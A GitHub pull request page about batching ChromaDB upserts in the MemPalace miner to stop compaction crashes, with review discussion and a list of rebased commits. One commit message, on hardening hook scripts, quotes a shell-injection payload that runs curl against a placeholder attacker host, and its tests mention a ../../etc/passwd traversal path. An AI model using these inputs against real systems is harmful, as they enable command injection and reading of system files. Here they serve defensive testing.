Skip to content

fix: batch upserts in miner to prevent ChromaDB 1.5.x compaction crashes#796

Open
IzmanIzy wants to merge 28 commits intoMemPalace:mainfrom
IzmanIzy:fix/batch-upsert-chromadb-compaction
Open

fix: batch upserts in miner to prevent ChromaDB 1.5.x compaction crashes#796
IzmanIzy wants to merge 28 commits intoMemPalace:mainfrom
IzmanIzy:fix/batch-upsert-chromadb-compaction

Conversation

@IzmanIzy
Copy link
Copy Markdown

Summary

  • Batch all chunks per file into a single collection.upsert() call instead of upserting each chunk individually. This reduces WAL write pressure that causes the Rust compactor in ChromaDB >= 1.5 to crash.
  • Add periodic checkpoints (every 200 files) that release and re-acquire the collection, giving the compactor time to flush background work.
  • Release collection reference at the end of mining for a clean shutdown.

Problem

When mining projects with 100+ files, the miner issues thousands of individual upserts. On ChromaDB 1.5.x this causes:

  1. Segfault (exit code 139) — the Rust compactor corrupts the metadata segment during concurrent individual writes
  2. InternalError: Failed to apply logs to the metadata segment — WAL entries accumulate faster than compaction can process them

Both errors are intermittent and depend on project size, making them hard to reproduce in small test suites but consistent on real-world knowledge bases (300+ files).

Root Cause

ChromaDB's Rust compactor (introduced in 1.5.x) runs in a background thread. Individual upserts create one WAL entry each, and 2000+ entries in rapid succession overwhelm the compactor's ability to merge them atomically. The previous code already had a comment about hnswlib's thread-unsafe updatePoint path causing segfaults on macOS ARM — this is the same class of bug on the compaction side, now affecting all platforms.

Testing

  • 37 existing miner tests pass (pytest tests/ -k "mine" — 37 passed, 0 failed)
  • Verified on a real 406-file knowledge base (3026 drawers) with ChromaDB 1.5.7 — zero crashes, clean completion with two checkpoint flushes at file 200 and 400
  • Lint (ruff check) and format (ruff format --check) pass
  • No changes to public API or CLI interface

Test plan

  • ruff check . passes
  • ruff format --check . passes
  • pytest tests/ -v --ignore=tests/benchmarks -k "mine" — 37 passed
  • Manual test: mine 406-file project with ChromaDB 1.5.7 — 3026 drawers, 0 crashes
  • Verify re-mining (modified files) still works correctly
  • Test with ChromaDB 0.6.x to confirm backward compatibility

🤖 Generated with Claude Code

@jphein
Copy link
Copy Markdown
Contributor

jphein commented Apr 13, 2026

This addresses the same WAL pressure issue we tackled in #629 — worth noting that PR also adds bulk mtime pre-fetch (bulk_check_mined()) and optional concurrent mining via --workers. The single-file batch approach here is cleaner for a targeted fix though. Might be worth coordinating so the two PRs don't conflict — happy to rebase #629 on top of this if it merges first.

1 similar comment
@IzmanIzy
Copy link
Copy Markdown
Author

This addresses the same WAL pressure issue we tackled in #629 — worth noting that PR also adds bulk mtime pre-fetch (bulk_check_mined()) and optional concurrent mining via --workers. The single-file batch approach here is cleaner for a targeted fix though. Might be worth coordinating so the two PRs don't conflict — happy to rebase #629 on top of this if it merges first.

@igorls igorls added area/mining File and conversation mining bug Something isn't working labels Apr 14, 2026
Kesshite and others added 24 commits April 14, 2026 07:54
…etic injection

save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace#809
…h test

- _count_human_messages() now logs a WARNING via _log() when a
  non-empty transcript_path is rejected by the validator, making
  silent auto-save failures diagnosable via hook.log
- Add test for platform-native paths (backslashes on Windows) to
  verify _validate_transcript_path works cross-platform
- Add test verifying the warning log is emitted on rejection

Refs: MemPalace#809
Noticed a URL 
```
hXXps://www.mempalace[.]tech/
```

Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README.
)

sanitize_name rejects commas, colons, parentheses, and slashes — characters
that commonly appear in knowledge graph subject/object values. Adds
sanitize_kg_value for KG entity fields (subject, object, entity) while
keeping sanitize_name for predicates and wing/room names.
When no mempalace.yaml or mempal.yaml exists in the source directory,
return a default config (wing = directory name, room = general) instead
of calling sys.exit(1). This lets users mine any directory into their
palace without requiring init first.

Closes MemPalace#14.
Addresses review feedback on MemPalace#604:

- Warning now goes to stderr instead of stdout so it doesn't mix with
  mine progress output when users pipe stdout elsewhere.
- Warning explicitly calls out that directories with the same basename
  will share a wing name, and suggests adding mempalace.yaml to
  disambiguate. Prevents silent content mixing across projects mined
  without yaml.
fix: allow mining directories without local mempalace.yaml
…ction

fix: harden hooks against shell injection, path traversal, and arithmetic injection
Replace the blanket ban on .tech/.io/.com domains with an allowlist
of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com)
and call out mempalace.tech as the reported impostor. The blanket
.com ban would have flagged mempalaceofficial.com as fake once DNS
resolves (CNAME shipped in MemPalace#877).

Also update the April 11 follow-up section to match so the two
notices no longer contradict each other.
…y-increase

Increase visibility of fake website caution
…ze-punctuation

fix: use permissive validator for KG entity values
Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution.

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>
…Palace#871)

export MEMPAL_VERBOSE=true  → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)

Developers need to see code and diaries being written.
Regular users want zero chat clutter. Now both work.

TDD: tests written first, failed, code fixed, tests pass.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Contributors now get a one-click dev environment that mirrors CI exactly:
Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same
>=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from
the existing .pre-commit-config.yaml.

Pinning ruff in post-create.sh is the load-bearing piece: pyproject only
sets a floor, so without the pin the ruff extension would install 0.15.x
and phantom-fail lint against CI's 0.4.x.
…ompilation-15578943484596502942

⚡ Optimize regex compilation in entity extraction
feat: add VSCode devcontainer matching CI environment
Closes MemPalace#872. The top-level decision field only recognizes "block".
To not block, return empty JSON {}. "allow" was silently ignored
by Claude Code, causing unpredictable behavior.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
fix: add missing self._lock to query_relationship, timeline, and stats in KnowledgeGraph
…sion

fix: replace invalid 'decision: allow' with {} in hooks (closes MemPalace#872)
TDD: test first, failed, fixed, passed.

Igor fixed query_relationship/timeline/stats in an earlier commit.
close() was the last method touching self._connection without
holding the lock.

Closes MemPalace#883.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
fix: add lock to KG close() — last missing lock (closes MemPalace#883)
The rerank pipeline was hardcoded to Anthropic's /v1/messages.
Add a backend flag so the same code path can be exercised with
any OpenAI-compatible endpoint — local Ollama, Ollama Cloud,
or any gateway that speaks /v1/chat/completions.

Enables independent verification of the "100% with Haiku rerank"
claim by running the full benchmark with a different LLM family
(e.g. minimax-m2.7:cloud) and zero Anthropic dependency.

Both longmemeval_bench.py and locomo_bench.py:
 - llm_rerank*() gain backend= / base_url= kwargs
 - CLI: --llm-backend {anthropic,ollama}, --llm-base-url
 - API key required only when backend=anthropic (diary/palace modes still require it)
 - Parse last integer in response (reasoning models emit multi-int output)
 - Fallback to message.reasoning when content is empty
 - Raise max_tokens to 1024 for reasoning models
igorls added 3 commits April 14, 2026 21:20
Addresses MemPalace#875: every internal BENCHMARKS.md claim reproduced
on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings,
seed=42 for the LongMemEval dev/held-out split).

Scorecard — all reproduce exactly:

  LongMemEval
    raw R@5                            96.6% (500/500)   ✅
    hybrid_v4 held-out 450 R@5         98.4% (442/450)   ✅
    hybrid_v4 + minimax rerank R@5     99.2% (496/500)   *
    hybrid_v4 + minimax rerank R@10   100.0% (500/500)   *

  LoCoMo (session, top-10)
    raw                                60.3% (1986q)     ✅
    hybrid v5                          88.9% (1986q)     ✅

  ConvoMem all-categories (250 items)   92.9%            ✅
  MemBench all-categories (8500)        80.3%            ✅

* The minimax-m2.7:cloud rerank run replicates the "100%" claim
  with a different LLM family (no Anthropic dependency). R@10 is
  a perfect reproduction; R@5 misses 4 questions that the
  published Haiku run caught — consistent with BENCHMARKS.md's own
  disclosure that hybrid_v4 includes three question-specific fixes
  developed by inspecting misses, i.e. teaching to the test.

The committed 50/450 split is the deterministic (seed=42) split
BENCHMARKS.md references but wasn't previously in the repo.

Full result JSONLs include every question, every retrieved id,
and every score — auditable end-to-end.
…tion

benchmarks: v3.3.0 reproduction results + Ollama rerank backend
Adapts the approach from @IzmanIzy's PR MemPalace#796 to current develop, which
diverged after that PR was opened — ``add_drawer`` now populates
additional metadata fields (``normalize_version``, ``hall``, ``entities``,
``source_mtime``) that a verbatim rebase of MemPalace#796 would have regressed.

Changes:

- Extract ``_build_drawer_payload()`` helper — single source of truth for
  drawer ID + metadata construction, shared by ``add_drawer`` (single
  drawer, kept as a thin wrapper for backwards compat with tests) and
  ``process_file`` (batched per-file path).
- ``process_file`` now accumulates all chunks from one file into batch
  lists and issues a single ``collection.upsert()`` call with them all,
  instead of one upsert per chunk. Preserves every metadata field
  ``add_drawer`` sets, including the ones added after MemPalace#796 was opened.
- ``mine()`` adds a periodic checkpoint every 200 files that releases and
  re-acquires the collection (and closets collection), letting the Rust
  compactor flush buffered WAL entries between batches.
- ``mine()`` releases both collection references at the end of mining
  so the final WAL entries flush cleanly before the process exits.

## Problem

A typical project mine issues thousands of individual ``col.upsert()``
calls. ChromaDB 1.5.x's Rust compactor runs concurrently with writes
and falls behind under this pattern, surfacing as:

- ``Segfault (exit 139)`` — the compactor corrupts the metadata segment
  during concurrent individual writes
- ``chromadb.errors.InternalError: Error in compaction: Failed to apply
  logs to the metadata segment``
- Later reads crash with ``mismatched types; Rust type u64 (as SQL type
  INTEGER) is not compatible with SQL type BLOB`` — the compactor left
  half-migrated rows with ``seq_id`` values still stored as BLOB instead
  of decoded to INTEGER

## Scope

``tests/test_miner.py::test_add_drawer`` and
``tests/test_hall_detection.py::test_add_drawer_includes_hall`` both call
``miner.add_drawer()`` directly and expect ``True`` + a single drawer
with full metadata. Both pass with the backwards-compat wrapper.

Related: MemPalace#796 (original PR, now has develop conflicts), MemPalace#899 (MCP
server library staleness — the other vector that creates compaction
crashes upstream of this fix).

Co-Authored-By: IzmanIzy <noreply@github.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
@messelink
Copy link
Copy Markdown

messelink commented Apr 15, 2026

Hi @IzmanIzy — I hit the exact compaction crash this PR fixes while mining into an existing palace that had accumulated BLOB-typed seq_id rows from a stale long-running MCP server (see #899 for that adjacent bug). The batching approach here solved my immediate problem, so thank you for writing it up.

I wanted to flag that this PR has a non-trivial rebase conflict against current develop: since it was opened, add_drawer() on develop has grown three new metadata fields that your PR's inlined version in process_file() doesn't reproduce — a verbatim cherry-pick would silently regress them. Specifically:

  • normalize_version (from palace.NORMALIZE_VERSION)
  • hall (from detect_hall(content))
  • entities (from _extract_entities_for_metadata(content))

The source_mtime try/except is also now in the common path.

I rebased your approach onto current develop and adapted it to preserve those fields. Rather than inlining metadata construction in process_file(), I extracted a _build_drawer_payload() helper and kept add_drawer() as a thin single-drawer wrapper (for backwards compat with the tests/test_miner.py::test_add_drawer and tests/test_hall_detection.py::test_add_drawer_includes_hall tests, which call add_drawer directly and check for normalize_version / hall in the stored metadata). The batched per-file upsert and the periodic checkpoint logic are kept as you wrote them.

Commit: messelink/mempalace@9cc1365
Branch: messelink:fix/batch-upsert-chromadb-compaction (clean off current upstream/develop)

Test I ran

A delete-and-remine of a 20-file subtree (mix of markdown docs and chat transcripts) into an existing ~14.8k-drawer palace. Result: 1,324 drawers filed in a single end-to-end run without any compaction errors. The largest single-file batch was 618 drawers in one collection.upsert() call — exactly the stress case your PR targets. Search against the re-mined content works correctly afterward.

Previously (without the batching), the same mine crashed with Error in compaction: Error reading from metadata segment reader: error occurred while decoding column 0: mismatched types; Rust type u64 (as SQL type INTEGER) is not compatible with SQL type BLOB on the first upsert, and I lost a chunk of drawers to silent file-already-mined skipping on retry.

How to proceed

Totally your call — I don't want to step on your PR. Three options:

  1. You fetch my branch and apply it to yoursgit fetch https://github.com/messelink/mempalace.git fix/batch-upsert-chromadb-compaction && git reset --hard FETCH_HEAD on your local fix/batch-upsert-chromadb-compaction, then force-push. Cleanest attribution (your PR, just rebased). The commit already credits you as Co-Authored-By.
  2. You enable "Allow edits from maintainers" on this PR, and I can't push directly (I'm not a maintainer of milla-jovovich/mempalace), but one of the maintainers could push my patch to your branch.
  3. If you're unavailable or prefer, I'm happy to open a separate PR that supersedes this one, credits you, and links back here.

Let me know which you prefer. Happy to wait a few days for a reply before doing option 3.

cc @milla-jovovich for awareness — this PR becomes unblocked with the rebase.

@bensig
Copy link
Copy Markdown
Collaborator

bensig commented Apr 15, 2026

hey @IzmanIzy — this conflicts with develop now. pls rebase and we can merge. thanks!

@bensig
Copy link
Copy Markdown
Collaborator

bensig commented Apr 15, 2026

@IzmanIzy pls check conflict

@messelink
Copy link
Copy Markdown

@bensig — just flagging that my comment above (03:26 UTC) has the rebased version ready if it helps move this along. Branch: messelink:fix/batch-upsert-chromadb-compaction, clean off current develop. Up to @IzmanIzy whether they want to pull it into their branch or I open a new PR.

@IzmanIzy IzmanIzy force-pushed the fix/batch-upsert-chromadb-compaction branch from f15bffd to 9cc1365 Compare April 15, 2026 14:11
@IzmanIzy IzmanIzy requested a review from igorls as a code owner April 15, 2026 14:11
@IzmanIzy
Copy link
Copy Markdown
Author

Rebased onto current develop using @messelink's cleaned-up version (thanks! 🙏). Conflict resolved, ready to merge.

@bensig good to go.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

area/mining File and conversation mining bug Something isn't working

Projects

None yet

Development

Successfully merging this pull request may close these issues.